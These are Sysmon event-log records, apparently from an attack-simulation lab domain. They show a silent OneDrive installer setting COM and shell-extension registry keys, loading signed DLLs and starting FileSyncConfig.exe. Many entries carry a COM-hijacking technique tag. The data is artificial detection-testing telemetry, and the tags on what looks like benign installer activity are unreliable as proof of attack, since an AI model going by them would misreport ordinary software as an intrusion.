13241300x800000000000000079866Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:28.683{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32\(Default)C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\amd64\FileCoAuthLib64.dll 13241300x800000000000000079865Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:28.681{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32\(Default)C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuthLib.dll 13241300x800000000000000079864Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:28.668{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\(Default){CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} 13241300x800000000000000079863Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:28.667{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\(Default){CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} 13241300x800000000000000079862Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:28.667{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\IE.AssocFile.URL\shellex\ContextMenuHandlers\ FileSyncEx\(Default){CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} 13241300x800000000000000079861Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:28.667{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\IE.AssocFile.URL\shellex\ContextMenuHandlers\ FileSyncEx\(Default){CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} 13241300x800000000000000079860Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:28.667{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\Directory\shellex\ContextMenuHandlers\ FileSyncEx\(Default){CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} 13241300x800000000000000079859Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:28.667{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\Directory\shellex\ContextMenuHandlers\ FileSyncEx\(Default){CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} 13241300x800000000000000079858Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:28.667{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\Directory\Background\shellex\ContextMenuHandlers\ FileSyncEx\(Default){CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} 13241300x800000000000000079857Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:28.666{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\Directory\Background\shellex\ContextMenuHandlers\ FileSyncEx\(Default){CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} 13241300x800000000000000079856Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:28.666{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\*\shellex\ContextMenuHandlers\ FileSyncEx\(Default){CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} 13241300x800000000000000079855Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:28.666{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\*\shellex\ContextMenuHandlers\ FileSyncEx\(Default){CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} 13241300x800000000000000079854Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:28.666{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\WOW6432Node\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32\(Default)C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncShell.dll 13241300x800000000000000079853Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:28.666{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32\(Default)C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\amd64\FileSyncShell64.dll 13241300x800000000000000079852Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:28.665{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\WOW6432Node\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32\(Default)C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncShell.dll 13241300x800000000000000079851Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:28.665{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32\(Default)C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\amd64\FileSyncShell64.dll 13241300x800000000000000079850Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:28.665{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\WOW6432Node\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32\(Default)C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncShell.dll 13241300x800000000000000079849Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:28.665{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32\(Default)C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\amd64\FileSyncShell64.dll 13241300x800000000000000079848Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:28.664{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\WOW6432Node\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32\(Default)C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncShell.dll 13241300x800000000000000079847Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:28.664{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32\(Default)C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\amd64\FileSyncShell64.dll 13241300x800000000000000079846Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:28.663{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\WOW6432Node\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}\InprocServer32\(Default)C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncShell.dll 13241300x800000000000000079845Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:28.663{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}\InprocServer32\(Default)C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\amd64\FileSyncShell64.dll 13241300x800000000000000079844Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:28.663{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\WOW6432Node\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3}\InprocServer32\(Default)C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncShell.dll 13241300x800000000000000079843Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:28.663{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3}\InprocServer32\(Default)C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\amd64\FileSyncShell64.dll 13241300x800000000000000079842Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:28.662{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\WOW6432Node\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32\(Default)C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncShell.dll 13241300x800000000000000079841Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:28.662{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32\(Default)C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\amd64\FileSyncShell64.dll 13241300x800000000000000079840Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:28.662{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\WOW6432Node\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32\(Default)C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncShell.dll 13241300x800000000000000079839Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:28.662{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32\(Default)C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\amd64\FileSyncShell64.dll 13241300x800000000000000079838Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:28.661{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\WOW6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32\(Default)C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncShell.dll 13241300x800000000000000079837Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:28.661{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32\(Default)C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\amd64\FileSyncShell64.dll 13241300x800000000000000079836Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:28.661{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\WOW6432Node\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\InprocServer32\(Default)C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncShell.dll 13241300x800000000000000079835Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:28.661{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\InprocServer32\(Default)C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\amd64\FileSyncShell64.dll 13241300x800000000000000079834Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:28.660{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\WOW6432Node\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32\(Default)C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncShell.dll 13241300x800000000000000079833Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:28.660{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32\(Default)C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\amd64\FileSyncShell64.dll 734700x800000000000000079832Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.295{A7A01FEF-EC14-607E-470E-00000000BB01}2240C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\wbem\wmiutils.dll10.0.14393.4169 (rs1_release.210107-1130)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwmiutils.dllMD5=5179B0DEF3AB5CAC3BA02316AF1B6B40,SHA256=FA4112CB0D1A133C41FD001F958F0BE930BB49072BF97A3D765AEA8DB841ABC4,IMPHASH=EE3767E8CDC80CCB91A8FC0A7407A4A9trueMicrosoft WindowsValid 734700x800000000000000079831Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.287{A7A01FEF-EC14-607E-470E-00000000BB01}2240C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\wbem\wbemsvc.dll10.0.14393.4169 (rs1_release.210107-1130)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemsvc.dllMD5=2BE97028B7B85762561F475E31989C2A,SHA256=75C9D8C6D41B4B7D70666A8107A08A748CEF6CB9E60AD0288B10CDE12E274AFF,IMPHASH=200200BEAF933FA4627BF83C67BA473EtrueMicrosoft WindowsValid 734700x800000000000000079830Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.600{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 17141700x800000000000000079829Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-CreatePipe2021-04-20 14:58:28.595{A7A01FEF-EC13-607E-450E-00000000BB01}3376\5EA58BF9-13F1-4F04-A152-CB928468DFFCC:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MicrosoftSearchInBing.exe 10341000x800000000000000079828Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.591{A7A01FEF-B626-607E-1300-00000000BB01}12642404C:\Windows\System32\svchost.exe{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079827Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.583{A7A01FEF-C0A3-607E-6C05-00000000BB01}36241208C:\Windows\system32\csrss.exe{A7A01FEF-EC14-607E-4A0E-00000000BB01}4208C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079826Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.581{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079825Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.581{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079824Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.580{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079823Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.580{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079822Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.580{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33846924C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-EC14-607E-4A0E-00000000BB01}4208C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\System32\windows.storage.dll+124156(wow64)|C:\Windows\System32\windows.storage.dll+123e11(wow64)|C:\Windows\System32\windows.storage.dll+123ee3(wow64)|C:\Windows\System32\windows.storage.dll+124bb5(wow64)|C:\Windows\System32\windows.storage.dll+123a61(wow64)|C:\Windows\System32\windows.storage.dll+125db0(wow64)|C:\Windows\System32\windows.storage.dll+12602c(wow64)|C:\Windows\System32\windows.storage.dll+125915(wow64)|C:\Windows\System32\SHELL32.dll+1a8264(wow64)|C:\Windows\System32\SHELL32.dll+1a813e(wow64)|C:\Windows\System32\SHELL32.dll+13be4a(wow64)|C:\Windows\System32\shcore.dll+2fffa(wow64) 154100x800000000000000079821Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.577{A7A01FEF-EC14-607E-4A0E-00000000BB01}4208C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe18.151.0729.0013Microsoft OneDrive Configuration ApplicationMicrosoft OneDriveMicrosoft CorporationFileSyncConfig.exe"C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe" C:\Windows\system32\ATTACKRANGE\Administrator{A7A01FEF-C0A5-607E-58C6-320000000000}0x32c6582HighMD5=2A333CC67C3DAAD5E4784A08CA4210C8,SHA256=5345A52E737F80DE378C2E4F61E56B9D169E01CCF4C2DBFA1099A336ED9FAFF2,IMPHASH=479A0D583C2F6822F3BBC39A672D3852{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe /silent /peruser /childprocess /enableOMCTelemetry 10341000x800000000000000079820Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 